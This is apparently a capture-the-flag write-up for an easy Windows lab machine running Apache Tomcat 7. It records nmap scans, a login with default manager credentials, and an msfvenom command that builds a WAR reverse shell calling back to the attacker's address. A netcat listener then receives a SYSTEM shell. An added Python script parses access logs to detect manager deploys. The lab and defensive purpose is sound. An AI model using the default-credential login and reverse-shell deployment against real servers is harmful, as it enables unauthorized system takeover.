#windows #hackthebox #easy
![[Pasted image 20250612211144.png]]
# Port scanning - Nmap
TCP all ports scan
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ sudo nmap -sS 10.10.10.95 -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:25 CDT
Nmap scan report for 10.10.10.95
Host is up (0.049s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds
```
UDP top 1000 ports scan
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ sudo nmap -sU 10.10.10.95 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:30 CDT
Nmap scan report for 10.10.10.95
Host is up (0.051s latency).
All 1000 scanned ports on 10.10.10.95 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds
```
TCP port 8080 detailed scan
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ nmap -sCV 10.10.10.95 -p 8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:32 CDT
Nmap scan report for 10.10.10.95
Host is up (0.054s latency).
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.88 seconds
```
# Footprinting
Navigated to `10.10.10.95:8080` in the browser and found the default Apache Tomcat page
![[Pasted image 20250612203601.png]]
`10.10.10.95:8080/manager` page reveals a username `tomcat` and password `s3cret`
![[Pasted image 20250612204738.png]]
I tried the credentials and they worked.
![[Pasted image 20250612205438.png]]
Scrolling down a bit, I found a file upload feature that only seems to accept `WAR` files.
![[Pasted image 20250612205518.png]]
Created a WAR reverse shell using msfvenom
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=1234 -f war -o shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
Saved as: shell.war
```
I uploaded the reverse shell, set up a listener, and clicked 'Deploy', which created a new application path called `/shell`. I navigated to that path and it triggered the reverse shell.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.95] 49196
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```
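From the defender's side, the deploy-and-trigger sequence above leaves a clear trail in Tomcat's access log. The following is an added example (mine, not part of the writeup) that parses constructed access-log lines in Tomcat's default `common` pattern and flags a successful manager deploy followed by the first request to a context path that was never seen before it; the sample lines and the `/shell` path are constructed to mirror the writeup, and the manager endpoint paths are the real Tomcat ones.

```python
import re

# Constructed sample lines in the default Tomcat AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). They are illustrative, not logs taken from the box.
SAMPLE_LOG = """\
10.10.10.50 - - [12/Jun/2025:20:30:00 -0500] "GET /docs/ HTTP/1.1" 200 19312
10.10.14.11 - - [12/Jun/2025:20:40:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.11 - tomcat [12/Jun/2025:20:40:15 -0500] "GET /manager/html HTTP/1.1" 200 15841
10.10.14.11 - tomcat [12/Jun/2025:20:54:30 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 16102
10.10.10.50 - - [12/Jun/2025:20:54:35 -0500] "GET /docs/index.html HTTP/1.1" 200 19312
10.10.14.11 - - [12/Jun/2025:20:54:41 -0500] "GET /shell/ HTTP/1.1" 200 -
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$')

# Manager endpoints that deploy an application: the HTML form upload used in the
# writeup, plus the text/script interface. These are real Tomcat paths.
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy|deploy)(\?|$)')

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def context_of(path):
    """First path segment, e.g. '/shell' for '/shell/' or '/shell/x.jsp'."""
    parts = path.split('?')[0].split('/')
    return '/' + parts[1] if len(parts) > 1 else path

def find_manager_deploys(log_text):
    """Return alerts for successful deploys through the manager app and for the
    first request to any context path not seen before such a deploy."""
    alerts, known_contexts, deployed = [], set(), False
    for e in filter(None, map(parse_line, log_text.splitlines())):
        if (e['method'] in ('POST', 'PUT') and DEPLOY_RE.match(e['path'])
                and e['status'] == '200'):
            alerts.append({'kind': 'manager_deploy', 'host': e['host'],
                           'user': e['user'], 'time': e['time']})
            deployed = True
            continue
        ctx = context_of(e['path'])
        if deployed and ctx not in known_contexts and ctx != '/manager':
            alerts.append({'kind': 'new_context_hit', 'host': e['host'],
                           'path': e['path'], 'time': e['time']})
        known_contexts.add(ctx)
    return alerts

if __name__ == '__main__':
    for alert in find_manager_deploys(SAMPLE_LOG):
        print(alert)
```

On a real host the same rule can be run over `logs/localhost_access_log.*.txt`; the `manager_deploy` alert alone is worth a ticket when nobody in operations pushed a release.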
In the path `C:\Users\Administrator\Desktop\flags`, the file named "2 for the price of 1.txt" contained both `user.txt` and `root.txt` flags.
```bash
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004...
root.txt
04a8...
```